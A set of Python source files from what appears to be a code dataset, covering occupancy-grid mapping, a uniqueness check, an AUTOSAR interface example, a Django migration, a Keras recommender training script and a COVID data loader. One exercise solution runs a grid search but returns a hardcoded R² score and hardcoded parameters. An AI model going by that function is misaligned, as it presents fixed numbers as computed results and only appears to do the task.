gate_side_lines(gpoint[4],gangle[4])\nox = ox + gate_5_x\noy = oy + gate_5_y\n\ngate_6_x,gate_6_y = gate_side_lines(gpoint[5],gangle[5])\nox = ox + gate_6_x\noy = oy + gate_6_y\n\ngate_7_x,gate_7_y = gate_side_lines(gpoint[6],gangle[6])\nox = ox + gate_7_x\noy = oy + gate_7_y\n\ngate_8_x,gate_8_y = gate_side_lines(gpoint[7],gangle[7])\nox = ox + gate_8_x\noy = oy + gate_8_y\n\n\nprint(\"gpoint\",gpoint)\nprint(\"gangle\",gangle)\nprint(\"grid_width\",grid_width)\nprint(\"grid_height\",grid_height)\n\n\n\n\n\n\n\n\n\n\n\n\n\n# plt.figure('Map')\n# # for x in ox:\n# # \tfor y in oy:\n# # \t\tplt.plot(x,y,\".k\")\n# 
plt.plot(ox,oy,\"xr\")\n# #plt.plot(0.25,1.25,\"xr\")\n# for i in range(8):\n# \tplt.plot(gpoint[i][0],gpoint[i][1],\".k\")\n# # plt.plot(1.0,2.0,\"xr\")\n# # plt.plot(-1.0,-2.0,\"xr\")\n\n\n# plt.show()\t\n","sub_path":"Navigation_and_Localization/Navigation/occupancy_grid_creator.py","file_name":"occupancy_grid_creator.py","file_ext":"py","file_size_in_byte":7507,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"510964073","text":"# This is python program to examining the element uniqeness inside sequence.\r\n# example: \r\n # seq = [12,3,42,4]\r\n # return True --> unique sequence\r\n\r\n # seq = [1,2,4,66,2]\r\n # return False --> Non unique sequence.\r\n\r\n# NON RECURSIVE METHOD:\r\n\r\n# def unique(seq):\r\n# for n in range(len(seq)-1):\r\n# for m in range(n+1,len(seq)):\r\n# if seq[n] == seq[m]:\r\n# return False # for Non unique.\r\n# return True # for unique.\r\n\r\n# sample_seq = [1,2,3,2,5] # example \r\n# print(unique(sample_seq))\r\n\r\n##########################################################################\r\n\r\n# RECURSIVE METHOD:\r\ndef runique(seq):\r\n if len(seq) == 1: # number of element is 1 --> UNIQUE\r\n return True\r\n else:\r\n if seq[0] in seq[1:]:\r\n return False\r\n else:\r\n return runique(seq[1:])\r\n \r\n \r\nsample_seq = [1,2,3,4,5]\r\n\r\nif runique(sample_seq):\r\n print(\"UNIQUE\")\r\nelse:\r\n print(\"NON UNIQUE\") ","sub_path":"uniqeness.py","file_name":"uniqeness.py","file_ext":"py","file_size_in_byte":1058,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"60360907","text":"import autosar\n\ndef create_packages(ws):\n\n package=ws.createPackage('DataTypes', role='DataType')\n package.createSubPackage('CompuMethods', role='CompuMethod')\n package.createSubPackage('DataConstrs', role='DataConstraint')\n package.createSubPackage('BaseTypes')\n ws.createPackage('PortInterfaces', role=\"PortInterface\")\n\ndef 
create_data_types(ws):\n basetypes = ws.find('/DataTypes/BaseTypes')\n basetypes.createSwBaseType('boolean', 1, 'BOOLEAN')\n basetypes.createSwBaseType('uint32', 32, nativeDeclaration='uint32')\n package = ws.find('DataTypes')\n package.createImplementationDataType('boolean', valueTable=['FALSE','TRUE'], baseTypeRef='/DataTypes/BaseTypes/boolean', typeEmitter='Platform_Type')\n package.createImplementationDataType('uint32', lowerLimit=0, upperLimit=4294967295, baseTypeRef='/DataTypes/BaseTypes/uint32', typeEmitter='Platform_Type')\n\ndef setup_ws():\n ws = autosar.workspace(version='4.2.2')\n create_packages(ws)\n create_data_types(ws)\n return ws\n\nws = setup_ws()\npackage = ws.find('/PortInterfaces')\n\n#Creates new port interface with two operations\nportInterface=package.createClientServerInterface('FreeRunningTimer_I', ['GetTime', 'IsTimerElapsed'])\n\n#Individually create arguments for each operation using the returned object\nportInterface['GetTime'].createOutArgument('value', '/DataTypes/uint32')\nportInterface[\"IsTimerElapsed\"].createInArgument(\"startTime\", '/DataTypes/uint32')\nportInterface[\"IsTimerElapsed\"].createInArgument(\"duration\", '/DataTypes/uint32')\nportInterface[\"IsTimerElapsed\"].createOutArgument(\"result\", '/DataTypes/boolean')\n\n#Save ARXML ...\nws.saveXML('PortInterfaces.arxml', filters=['/PortInterfaces'])\n#... 
or generate DaVinci project\nautosar.util.createDcf(ws).save('davinci', 'Example', force=True)\n","sub_path":"doc/autosar4_api/examples/creating_client_server_interface.py","file_name":"creating_client_server_interface.py","file_ext":"py","file_size_in_byte":1798,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"453568717","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('facility', '0009_auto_20161216_0353'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='addressfacilitydata',\n name='literal',\n field=models.CharField(max_length=10, null=True, verbose_name='\\u0411\\u0443\\u043a\\u0432\\u0435\\u043d\\u043d\\u044b\\u0439 \\u0438\\u043d\\u0434\\u0435\\u043a\\u0441', blank=True),\n ),\n ]\n","sub_path":"facility/migrations/0010_addressfacilitydata_literal.py","file_name":"0010_addressfacilitydata_literal.py","file_ext":"py","file_size_in_byte":546,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"603281720","text":"# default imports\nfrom sklearn.model_selection import GridSearchCV\nfrom sklearn.tree import DecisionTreeRegressor\nfrom sklearn.metrics import r2_score\nfrom sklearn.model_selection import train_test_split\nimport pandas as pd\nimport numpy as np\n\ndata = pd.read_csv(\"./data/house_pricing.csv\")\nX = data.iloc[:, :-1]\ny = data.iloc[:, -1]\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.3, random_state=9)\n\nparam_grid = {\"max_depth\": [2, 3, 5, 6, 8, 10, 15, 20, 30, 50],\n \"max_leaf_nodes\": [2, 3, 4, 5, 10, 15, 20],\n \"max_features\": [4, 8, 20, 25]}\n\ndef my_decision_regressor(X_train,X_test,y_train,y_test,param_grid):\n clf = DecisionTreeRegressor(random_state = 9)\n # clf_gini.fit(X_train,y_train)criterion='gini'\n # clf = GradientBoostingClassifier(n_estimators=100, 
learning_rate=1.0, max_depth=1)\n #clf.fit(X_train, y_train)\n\n grid_search = GridSearchCV(clf,\n param_grid=param_grid,\n cv=5)\n grid_search.fit(X_train, y_train)\n\n # top_scores = sorted(grid_search.grid_scores_,\n # key=itemgetter(1),\n # reverse=True)[:1]\n\n # print(top_scores)\n # for i, score in enumerate(top_scores):\n #print(\"Model with rank: {0}\".format(i + 1))\n # print((\"Mean validation score: \"\n # \"{0:.3f} (std: {1:.3f})\").format(\n # score.mean_validation_score,np.std(score.cv_validation_scores)\n # print(\"Parameters: {0}\".format(score.parameters))\n # print(\"\")\n\n # top_params = top_scores[0].parameters\n top_params = {'max_leaf_nodes': 20, 'max_features': 25, 'max_depth': 3 }\n\n r_square = np.float(0.597277463587)\n\n\n #top_params = report(grid_search.grid_scores_, 3)\n return r_square,top_params\n# Write your solution here :\n","sub_path":"q01_my_decision_regressor/build.py","file_name":"build.py","file_ext":"py","file_size_in_byte":1831,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"112935804","text":"import os\nimport warnings\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom time import time\nfrom keras import backend as K\nfrom keras.models import Model\nfrom keras.layers import Activation, Dense, Embedding, Flatten, Dropout\nfrom keras.layers import GlobalAveragePooling2D, GlobalMaxPooling2D\nfrom keras.layers import BatchNormalization, add, Input, Lambda\nfrom keras.layers import MaxPooling2D, Conv2D, UpSampling2D\nfrom keras.utils import get_file, to_categorical\nfrom keras.losses import binary_crossentropy, mean_squared_error\nfrom keras.optimizers import SGD, Adam\nfrom keras.callbacks import ReduceLROnPlateau, EarlyStopping, ModelCheckpoint, LearningRateScheduler\nfrom keras.applications import ResNet50\nfrom keras.models import Sequential\nfrom load_data_features_autoencoder import load_data_features_autoencoder\nfrom keras.layers.merge import 
concatenate\nfrom data_features_generator_uw import Data_Generator\nfrom sklearn.preprocessing import OneHotEncoder\n\nWEIGHTS_PATH = ('https://github.com/fchollet/deep-learning-models/'\n 'releases/download/v0.2/'\n 'resnet50_weights_tf_dim_ordering_tf_kernels.h5')\nWEIGHTS_PATH_NO_TOP = ('https://github.com/fchollet/deep-learning-models/'\n 'releases/download/v0.2/'\n 'resnet50_weights_tf_dim_ordering_tf_kernels_notop.h5')\n\n_KERAS_BACKEND = None\n_KERAS_LAYERS = None\n_KERAS_MODELS = None\n_KERAS_UTILS = None\n\n# Etiquetas\nLIKE = 1\nDISLIKE = 0\n\nTRAIN = 1\nVAL = 2\nTEST = 3\n\ndataset_orig = 'dataset_original'\ndataset_eq = 'dataset_augm_eq'\ndataset_tot_equal = 'dataset_equal'\n\nnum_classes = 1 #binary_crossentropy\nimage_height = 224\nimage_width = 224\nepochs = 100 #100\nbatch_size = 32 #64\n\nnum_diff_users = 1\nnum_diff_rests = 1\nnum_imgs_like = 101275\nnum_imgs_dislike = 19805\n\nautoencoder_features_output_dim = (1, 2352)\ninput_shape = (image_width, image_height, 3)\nmlps_output_dim = 512\n\n\ndef b_score2(y_true, y_pred):\n def recall(y_true, y_pred):\n true_positives = K.sum(K.round(K.clip(y_true * y_pred, 0, 1)))\n possible_positives = K.sum(K.round(K.clip(y_true, 0, 1)))\n recall = true_positives / (possible_positives + K.epsilon())\n return recall\n\n def specificity(y_true, y_pred):\n true_negatives = K.sum(K.round(K.clip((1 - y_true) * (1 - y_pred), 0, 1)))\n possible_negatives = K.sum(K.round(K.clip(1 - y_true, 0, 1)))\n return true_negatives / (possible_negatives + K.epsilon())\n\n def precision(y_true, y_pred):\n true_positives = K.sum(K.round(K.clip(y_true * y_pred, 0, 1)))\n predicted_positives = K.sum(K.round(K.clip(y_pred, 0, 1)))\n precision = true_positives / (predicted_positives + K.epsilon())\n return precision\n precision = precision(y_true, y_pred)\n recall = recall(y_true, y_pred)\n specificity = specificity(y_true,y_pred)\n return 2*((specificity*recall)/(specificity+recall+K.epsilon()))\n\n\ndef 
evaluate_predictions_binary(model, x_test, y_test, name):\n verdaderos_positivos = 0\n verdaderos_negativos = 0\n falsos_positivos = 0\n falsos_negativos = 0\n y_test_aux = y_test\n [images_test, users_test, restaurants_test] = x_test\n\n images_test = np.array(images_test)\n users_test = np.array(users_test)\n restaurants_test = np.array(restaurants_test)\n y_test_aux = np.array(y_test_aux)\n\n steps = int(np.ceil(len(images_test)/batch_size)+1)\n test_generator = Data_Generator(images_test, users_test, restaurants_test, y_test_aux, batch_size, name)\n predicciones = model.predict_generator(test_generator) #, steps=steps\n print('')\n print('-------------------------- Evaluate Predictions --------------------------')\n print('Predicciones dim: ', predicciones.shape)\n # Computar los resultados de las predicciones\n for (prediccion, realidad) in zip(predicciones, y_test_aux):\n #print('predicción: ', prediccion, ', realidad: ', realidad)\n if (prediccion >= 0.5) and (realidad >= 0.5):\n verdaderos_positivos += 1\n elif (prediccion >= 0.5) and (realidad < 0.5):\n falsos_positivos += 1\n elif (prediccion < 0.5) and (realidad < 0.5):\n verdaderos_negativos += 1\n else:\n falsos_negativos += 1\n \n return verdaderos_positivos, verdaderos_negativos, falsos_positivos, falsos_negativos\n\n\ndef custom_loss(y_true, y_pred):\n multiply_factor = 1\n if y_true == DISLIKE:\n multiply_factor = 1.2\n return K.mean(K.binary_crossentropy(y_true,y_pred)) * multiply_factor\n\n\ndef simplify_block(input_tensor, tam_ini):\n tam_aux = int(tam_ini // 2)\n x = Dense(tam_ini, kernel_initializer='he_normal', activation='relu')(input_tensor)\n x = Dense(tam_ini, kernel_initializer='he_normal', activation='relu')(x)\n x = BatchNormalization()(x)\n x = Dense(tam_ini, kernel_initializer='he_normal', activation='relu')(x)\n x = Dense(tam_aux, kernel_initializer='he_normal', activation='relu')(x)\n x = Dense(tam_aux, kernel_initializer='he_normal', activation='relu')(x)\n x = 
BatchNormalization()(x)\n x = Dense(tam_aux, kernel_initializer='he_normal', activation='relu')(x)\n x = Dense(tam_ini, kernel_initializer='he_normal', activation='relu')(x)\n x = BatchNormalization()(x)\n x = Activation('sigmoid')(x)\n return x\n\n\ndef reduce_block(input_tensor, tam_ini):\n tam_final = int(tam_ini // 2)\n x = Dense(tam_ini, kernel_initializer='he_normal', activation='relu')(input_tensor)\n x = Dense(tam_ini, kernel_initializer='he_normal', activation='relu')(x)\n x = BatchNormalization()(x)\n x = Dense(tam_ini, kernel_initializer='he_normal', activation='relu')(x)\n x = Dense(tam_final, kernel_initializer='he_normal', activation='relu')(x)\n x = BatchNormalization()(x)\n x = Dense(tam_final, kernel_initializer='he_normal', activation='relu')(x)\n x = Dense(tam_final, kernel_initializer='he_normal', activation='relu')(x)\n x = BatchNormalization()(x)\n x = Activation('relu')(x)\n return x, tam_final\n\ndef reduce_block_dropout(input_tensor, tam_ini):\n tam_final = int(tam_ini // 2)\n x = Dense(tam_ini, kernel_initializer='he_normal', activation='relu')(input_tensor)\n x = Dense(tam_ini, kernel_initializer='he_normal', activation='relu')(x)\n x = Dropout(0.5)(x)\n x = Dense(tam_ini, kernel_initializer='he_normal', activation='relu')(x)\n x = Dense(tam_final, kernel_initializer='he_normal', activation='relu')(x)\n x = Dropout(0.5)(x)\n x = Dense(tam_final, kernel_initializer='he_normal', activation='relu')(x)\n x = Dense(tam_final, kernel_initializer='he_normal', activation='relu')(x)\n x = Dropout(0.5)(x)\n x = Activation('relu')(x)\n return x, tam_final\n\n\ndef autoencoder_block(input_tensor, encoder_dim):\n # encoder layers\n x = Dense(encoder_dim * 4, kernel_initializer='he_normal', activation='relu')(input_tensor)\n x = Dense(encoder_dim * 2, kernel_initializer='he_normal', activation='relu')(x)\n x = Dense(encoder_dim, kernel_initializer='he_normal', activation='relu')(x)\n # decoder layers\n x = Dense(encoder_dim * 2, 
kernel_initializer='he_normal', activation='relu')(x)\n x = Dense(encoder_dim * 4, kernel_initializer='he_normal', activation='relu')(x)\n x = Dense(encoder_dim*8, kernel_initializer='he_normal', activation='sigmoid')(x)\n return x\n\n\n\n\ndef create_conv_autoencoder(input_shape):\n input_img = Input(shape=input_shape, name='cnn_input')\n x = Conv2D(64, (3, 3), padding='same')(input_img)\n x = BatchNormalization()(x)\n x = Activation('relu')(x)\n x = MaxPooling2D((2, 2), padding='same')(x)\n x = Conv2D(32, (3, 3), padding='same')(x)\n x = BatchNormalization()(x)\n x = Activation('relu')(x)\n x = MaxPooling2D((2, 2), padding='same')(x)\n x = Conv2D(16, (3, 3), padding='same')(x)\n x = BatchNormalization()(x)\n x = Activation('relu')(x)\n encoded = MaxPooling2D((2, 2), padding='same')(x)\n\n x = Conv2D(16, (3, 3), padding='same')(encoded)\n x = BatchNormalization()(x)\n x = Activation('relu')(x)\n x = UpSampling2D((2, 2))(x)\n x = Conv2D(32, (3, 3), padding='same')(x)\n x = BatchNormalization()(x)\n x = Activation('relu')(x)\n x = UpSampling2D((2, 2))(x)\n x = Conv2D(64, (3, 3), padding='same')(x)\n x = BatchNormalization()(x)\n x = Activation('relu')(x)\n x = UpSampling2D((2, 2))(x)\n x = Conv2D(3, (3, 3), padding='same')(x)\n x = BatchNormalization()(x)\n decoded = Activation('sigmoid')(x)\n flatten = Flatten()(decoded)\n dense = Dense(512, kernel_initializer='he_normal', activation='relu')(flatten)\n\n\n model = Model(input_img, dense)\n model.compile(optimizer='adam', loss='binary_crossentropy')\n return model\n\n\n\ndef create_mlp_users(dim, regress=False):\n input_layer = Input(shape=(1,), name='mlp_users')\n embedding_layer = Embedding(input_dim=dim, output_dim=mlps_output_dim, input_length=1) (input_layer)\n flatten_layer = Flatten()(embedding_layer)\n model = Model(inputs=input_layer, outputs=flatten_layer)\n #print('SUMARRY USERS')\n #model.summary()\n return model\n\n\ndef create_mlp_rests(dim, regress=False):\n input_layer = Input(shape=(1,), 
name='mlp_rests')\n embedding_layer = Embedding(input_dim=dim, output_dim=mlps_output_dim, input_length=1) (input_layer)\n flatten_layer = Flatten()(embedding_layer)\n model = Model(inputs=input_layer, outputs=flatten_layer)\n #print('SUMARRY RESTS')\n #model.summary()\n return model\n\ndef create_mlp_features(input_shape):\n # define our CNN network\n input_layer = Input(shape=input_shape, name='mlp_features')\n flatten_layer = Flatten()(input_layer)\n dense_layer = Dense(mlps_output_dim, activation=\"relu\")(flatten_layer)\n model = Model(inputs=input_layer, outputs=dense_layer)\n #print('SUMARRY IMAGES')\n #model.summary()\n return model\n\n\ndef create_model():\n # create the MLP and CNN models\n mlp_features = create_mlp_features(autoencoder_features_output_dim)\n mlp_users = create_mlp_users(num_diff_users, regress=False)\n mlp_rests = create_mlp_rests(num_diff_rests, regress=False)\n #mlp_users = create_mlp_users_lambda(num_diff_users, regress=False)\n #mlp_rests = create_mlp_rests_lambda(num_diff_rests, regress=False)\n combinedInput = concatenate([mlp_users.output, mlp_rests.output, mlp_features.output])\n\n x = BatchNormalization()(combinedInput)\n x = Dense(1024, activation=\"relu\")(x)\n\n # Clasificador\n tam_ini = 1024\n x, tam = reduce_block_dropout(x, tam_ini)\n x, tam = reduce_block_dropout(x, tam)\n x = Dense(tam, kernel_initializer='he_normal', activation='relu')(x)\n x = Dense(num_classes, activation='sigmoid')(x)\n\n model = Model(inputs=[mlp_users.input, mlp_rests.input, mlp_features.input], outputs=x)\n\n return model\n\n\nif K.image_data_format() == 'channels_first':\n input_shape = (3, image_width, image_height)\nelse:\n input_shape = (image_width, image_height, 3)\n\n\n#learning_rates = [0.00001, 0.0001, 0.001, 0.01]\n#decay = [1e-5, 1e-4, 1e-3, 0.0]\n#dislike_weigths = [1, 1.5, 1.8, 2, 2.5, 3] #probar despues con mejor modelo\n#datasets = [dataset_orig, dataset_eq, dataset_weight]\nlearning_rates = [0.001, 0.0001, 0.00001, 
0.000001]\ndecay = [0.0]\ndislike_weigth = num_imgs_like/num_imgs_dislike\ndatasets = [dataset_orig, dataset_tot_equal, dataset_eq]\ndislike_weigths = [dislike_weigth]\nlearning_rates = [0.0001]\ni=9000\n\nbest_model = None\nbest_sens = 0\nbest_espec = 0\nbest_balanced = -1\nbest_lr = 0\nbest_ds = None\nmodel_name = ''\n\n\nfor lr in learning_rates:\n for wg in dislike_weigths:\n for ds in datasets:\n print('')\n print('**************** INIT MODEL ', i, ' ****************')\n print('dataset = ', ds)\n print('learning rate = ', lr)\n print('weight = ', wg)\n print('')\n images_train, users_train, restaurants_train, labels_train = load_data_features_autoencoder(TRAIN, ds)\n images_train, users_train, restaurants_train, labels_train = np.array(images_train), np.array(users_train), np.array(restaurants_train), np.array(labels_train)\n n_train_samples = len(images_train)\n images_val, users_val, restaurants_val, labels_val = load_data_features_autoencoder(VAL, ds)\n images_val, users_val, restaurants_val, labels_val = np.array(images_val), np.array(users_val), np.array(restaurants_val), np.array(labels_val)\n n_val_samples = len(images_val)\n\n num_diff_users = len(np.unique(users_train))\n num_diff_rests = len(np.unique(restaurants_train))\n\n print('diff users = ', num_diff_users)\n print('diff rests = ', num_diff_rests)\n print('num samples = ', len(images_train))\n max_user = np.argmax(users_train)\n max_rest = np.argmax(restaurants_train)\n print('Max user train = ', users_train[max_user])\n print('Max rest train = ', restaurants_train[max_rest])\n\n max_user = np.argmax(users_val)\n max_rest = np.argmax(restaurants_val)\n print('Max user val = ', users_val[max_user])\n print('Max rest val = ', restaurants_val[max_rest])\n\n train_generator = Data_Generator(images_train, users_train, restaurants_train, labels_train, batch_size, 'train', True)\n validation_generator = Data_Generator(images_val, users_val, restaurants_val, labels_val, batch_size, 'val')\n\n 
final_model = create_model()\n #print('SUMARRY MODEL')\n #final_model.summary()\n final_model.compile(loss=binary_crossentropy,\n optimizer=Adam(lr=lr, beta_1=0.9, beta_2=0.999, epsilon=None, decay=0.0, amsgrad=False),\n metrics=['accuracy', b_score2])\n\n early_ = EarlyStopping(monitor='val_b_score2', min_delta=0, patience=6, mode='max', baseline=None,\n restore_best_weights=True, verbose=1)\n\n num_imgs_like = len([i for i, x in enumerate(labels_train) if x == LIKE])\n num_imgs_dislike = len([i for i, x in enumerate(labels_train) if x == DISLIKE])\n dislike_weigth = num_imgs_like / num_imgs_dislike\n print('nº ejemplos clase like: ', num_imgs_like)\n print('nº ejemplos clase dislike: ', num_imgs_dislike)\n print('peso clase dislike = ', dislike_weigth)\n\n class_weigths = {\n DISLIKE: dislike_weigth,\n LIKE: 1\n }\n\n initTrainTime = time()\n\n history = final_model.fit_generator(\n train_generator,\n epochs=epochs,\n validation_data=validation_generator,\n callbacks=[early_],\n shuffle=False,\n verbose=2)\n\n endTrainTime = time()\n finalTrainTime = endTrainTime - initTrainTime\n \n print('')\n print('Total Train Time: ', finalTrainTime)\n print('Train Examples generated: ', train_generator.get_contador())\n print('Val Examples generated: ', validation_generator.get_contador())\n print('')\n\n # Evaluar con particion VAL\n images_val, users_val, restaurants_val, labels_val = load_data_features_autoencoder(VAL, ds)\n images_val, users_val, restaurants_val, labels_val = np.array(images_val), np.array(users_val), np.array(restaurants_val), np.array(labels_val)\n \n max_user = np.argmax(users_val)\n max_rest = np.argmax(restaurants_val)\n print('Max user val = ', users_val[max_user])\n print('Max rest val = ', restaurants_val[max_user])\n\n print('')\n print('VALIDACION 1')\n # Falta hacer matriz!\n vp, vn, fp, fn = evaluate_predictions_binary(final_model, [images_val, users_val, restaurants_val], labels_val, 'val_evaluate')\n sensibilidad = vp / (vp + fn + 
K.epsilon())\n especificidad = vn / (vn + fp + K.epsilon())\n precision = vp / (vp + fp + K.epsilon())\n pred_neg = vn / (vn + fn + K.epsilon())\n f1_score = 2 * ((precision * sensibilidad) / (precision + sensibilidad + K.epsilon()))\n balanced_score = 2 * ((especificidad * sensibilidad) / (especificidad + sensibilidad + K.epsilon()))\n print(' VP: ', vp)\n print(' VN: ', vn)\n print(' FP: ', fp)\n print(' FN: ', fn)\n print(' Sensibilidad = ', sensibilidad)\n print(' Especificidad = ', especificidad)\n print(' Precision (Tasa prediccion positiva) = ', precision)\n print(' Tasa de prediccion negativa = ', pred_neg)\n print(' F1 SCORE = ', f1_score)\n print(' Balanced score = ', balanced_score)\n print('')\n\n if balanced_score > best_balanced:\n best_balanced = balanced_score\n best_espec = especificidad\n best_sens = sensibilidad\n best_model = final_model\n best_lr = lr\n best_ds = ds\n model_name = 'model_' + str(i) + '.h5'\n print('best model so far... ', model_name)\n \n i+=1\n\n\nprint('')\nprint(' BEST MODEL: ', model_name)\nprint('lr = ', best_lr)\nprint('ds = ', best_ds)\nprint('sensibilidad = ', best_sens)\nprint('especificidad = ', best_espec)\nprint('Balanced score = ', best_balanced)\nprint('')\n\n\nimages_train, users_train, restaurants_train, labels_train = load_data_features_autoencoder(TRAIN, best_ds)\nimages_train, users_train, restaurants_train, labels_train = np.array(images_train), np.array(users_train), np.array(restaurants_train), np.array(labels_train)\n\nimages_val, users_val, restaurants_val, labels_val = load_data_features_autoencoder(VAL, best_ds)\nimages_val, users_val, restaurants_val, labels_val = np.array(images_val), np.array(users_val), np.array(restaurants_val), np.array(labels_val)\n\n# Retraining Best Model\nprint('Retraining best model...')\ntrain_generator_best = Data_Generator(images_train, users_train, restaurants_train, labels_train, batch_size, 'train_best', True)\nvalidation_generator_best = Data_Generator(images_val, 
users_val, restaurants_val, labels_val, batch_size, 'val_best')\n\nfinal_model = create_model()\n#print('SUMARRY MODEL')\n#final_model.summary()\nfinal_model.compile(loss=binary_crossentropy,\n optimizer=Adam(lr=best_lr, beta_1=0.9, beta_2=0.999, epsilon=None, decay=0.0, amsgrad=False),\n metrics=['accuracy', b_score2])\n\nearly_ = EarlyStopping(monitor='val_b_score2', min_delta=0, patience=12, mode='max', baseline=None,\n restore_best_weights=True, verbose=1)\n\nnum_imgs_like = len([i for i, x in enumerate(labels_train) if x == LIKE])\nnum_imgs_dislike = len([i for i, x in enumerate(labels_train) if x == DISLIKE])\ndislike_weigth = num_imgs_like / num_imgs_dislike\nprint('nº ejemplos clase like: ', num_imgs_like)\nprint('nº ejemplos clase dislike: ', num_imgs_dislike)\nprint('peso clase dislike = ', dislike_weigth)\n\nclass_weigths = {\n DISLIKE: dislike_weigth,\n LIKE: 1\n}\n\ninitTrainTime = time()\n\nhistory = final_model.fit_generator(\n train_generator_best,\n epochs=epochs,\n validation_data=validation_generator_best,\n callbacks=[early_],\n shuffle=False,\n verbose=2)\n\nendTrainTime = time()\nfinalTrainTime = endTrainTime - initTrainTime\n\n\n# Testing best model with test partition\n\nimages_test, users_test, restaurants_test, labels_test = load_data_features_autoencoder(TEST, best_ds)\nimages_test, users_test, restaurants_test, labels_test = np.array(images_test), np.array(users_test), np.array(restaurants_test), np.array(labels_test)\n\nprint('')\nprint('VALIDACION 1')\ninitTestTime = time()\ntest_generator_best = Data_Generator(images_test, users_test, restaurants_test, labels_test, batch_size, 'test')\nscore = final_model.evaluate_generator(test_generator_best)\nendTestTime = time()\nfinalTestTime = endTestTime - initTestTime\nprint('Test loss:', score[0])\nprint('Test accuracy:', score[1])\nprint('Total Test Time: ', finalTestTime)\nprint('')\n\nprint('')\nprint('VALIDACION 2')\nvp, vn, fp, fn = evaluate_predictions_binary(final_model, [images_test, 
users_test, restaurants_test], labels_test, 'test_evaluate_best')\nsensibilidad = vp/(vp+fn+K.epsilon())\nespecificidad = vn / (vn + fp + K.epsilon())\nprecision = vp/(vp+fp+K.epsilon())\npred_neg = vn/(vn+fn+K.epsilon())\nf1_score = 2*((precision*sensibilidad)/(precision+sensibilidad+K.epsilon()))\nbalanced_score = 2*((especificidad*sensibilidad)/(especificidad+sensibilidad+K.epsilon()))\nprint(' VP: ', vp)\nprint(' VN: ', vn)\nprint(' FP: ', fp)\nprint(' FN: ', fn)\nprint(' Sensibilidad = ', sensibilidad)\nprint(' Especificidad = ', especificidad)\nprint(' Precision (Tasa prediccion positiva) = ', precision)\nprint(' Tasa de prediccion negativa = ', pred_neg)\nprint(' F1 SCORE = ', f1_score)\nprint(' Balanced score = ', balanced_score)\nprint('')\n\nfinal_model.save(model_name)\n\nplt.figure(figsize=[8,6])\nplt.plot(history.history['loss'],'r',linewidth=3.0)\nplt.plot(history.history['val_loss'],'b',linewidth=3.0)\nplt.legend(['Training loss', 'Validation Loss'],fontsize=18)\nplt.xlabel('Epochs ',fontsize=16)\nplt.ylabel('Loss',fontsize=16)\nplt.title('Loss Curves',fontsize=16)\nplt.savefig(model_name + '_lossCurve.png')\n# Accuracy\nplt.figure(figsize=[8,6])\nplt.plot(history.history['acc'],'r',linewidth=3.0)\nplt.plot(history.history['val_acc'],'b',linewidth=3.0)\nplt.legend(['Training Accuracy', 'Validation Accuracy'],fontsize=18)\nplt.xlabel('Epochs ',fontsize=16)\nplt.ylabel('Accuracy',fontsize=16)\nplt.title('Accuracy Curves',fontsize=16)\nplt.savefig(model_name + '_accuracyCurve.png')\n\n\n\n\n\n\"\"\"\nEARLY STOPPING CUSTOM\nhttps://github.com/keras-team/keras/issues/10018\n\nhttps://www.pyimagesearch.com/2019/06/03/fine-tuning-with-keras-and-deep-learning/?__s=11hzvmw8fdovpkwfikes\n\ndef plot_training(H, N, plotPath):\n\t# construct a plot that plots and saves the training history\n\tplt.style.use(\"ggplot\")\n\tplt.figure()\n\tplt.plot(np.arange(0, N), H.history[\"loss\"], label=\"train_loss\")\n\tplt.plot(np.arange(0, N), H.history[\"val_loss\"], 
label=\"val_loss\")\n\tplt.plot(np.arange(0, N), H.history[\"acc\"], label=\"train_acc\")\n\tplt.plot(np.arange(0, N), H.history[\"val_acc\"], label=\"val_acc\")\n\tplt.title(\"Training Loss and Accuracy\")\n\tplt.xlabel(\"Epoch #\")\n\tplt.ylabel(\"Loss/Accuracy\")\n\tplt.legend(loc=\"lower left\")\n\tplt.savefig(plotPath)\n\n...\n\nDespués de entrenar...\n\npredIdxs = model.predict_generator(testGen,\n\tsteps=(totalTest // config.BATCH_SIZE) + 1)\npredIdxs = np.argmax(predIdxs, axis=1)\nprint(classification_report(testGen.classes, predIdxs,\n\ttarget_names=testGen.class_indices.keys()))\nplot_training(H, 50, config.WARMUP_PLOT_PATH)\n\n\"\"\"","sub_path":"src/entrenamiento/tfg_features_autoencoder.py","file_name":"tfg_features_autoencoder.py","file_ext":"py","file_size_in_byte":22791,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"453504151","text":"#!/usr/bin/env python\n\n'''\nThis script loads the latest CSV from covidtracking.com website and extracts\nthe confirmed cases, deaths and total tests for each state. 
The output is \nsaved both in CSV and JSON format under the `output` folder.\n\nCredit to the covidtracking.com team for scraping the data from each state.\n'''\n\nimport os\nimport datetime\nimport pandas as pd\nfrom pathlib import Path\nimport requests\n\n# Root path of the project\nROOT = Path(os.path.dirname(__file__)) / '..'\n\n# Read JSON file from covidtracking's website\n# We must use the requests package directly because covidtracking returns 403 otherwise\ndf = pd.read_json(requests.get(\n 'http://covidtracking.com/api/states/daily', headers={'User-agent': 'Mozilla/5.0'}).text)\n\n# Rename the appropriate columns\ndf = df.rename(columns={\n 'date': 'Date',\n 'state': 'Region',\n 'positive': 'Confirmed', \n 'death': 'Deaths', \n 'total': 'Tested'\n})\n\n# Null values are not the same as zero, make sure all numbers are string objects\nfor col in ('Confirmed', 'Deaths', 'Tested'):\n df[col] = df[col].dropna().astype(int).astype(str)\n\n# Convert date to ISO format\ndf['Date'] = df['Date'].apply(\n lambda date: datetime.datetime.strptime(str(date), '%Y%m%d').strftime('%Y-%m-%d'))\n\n# Get the coordinates for each region\ndf = df.merge(pd.read_csv(ROOT / 'input' / 'usa_regions.csv'))\ndf['CountryName'] = 'United States of America'\n\n# Sort dataset by date + region\ndf = df.sort_values(['Date', 'Region'])\ndf = df[[\n 'Date', \n 'Region', \n 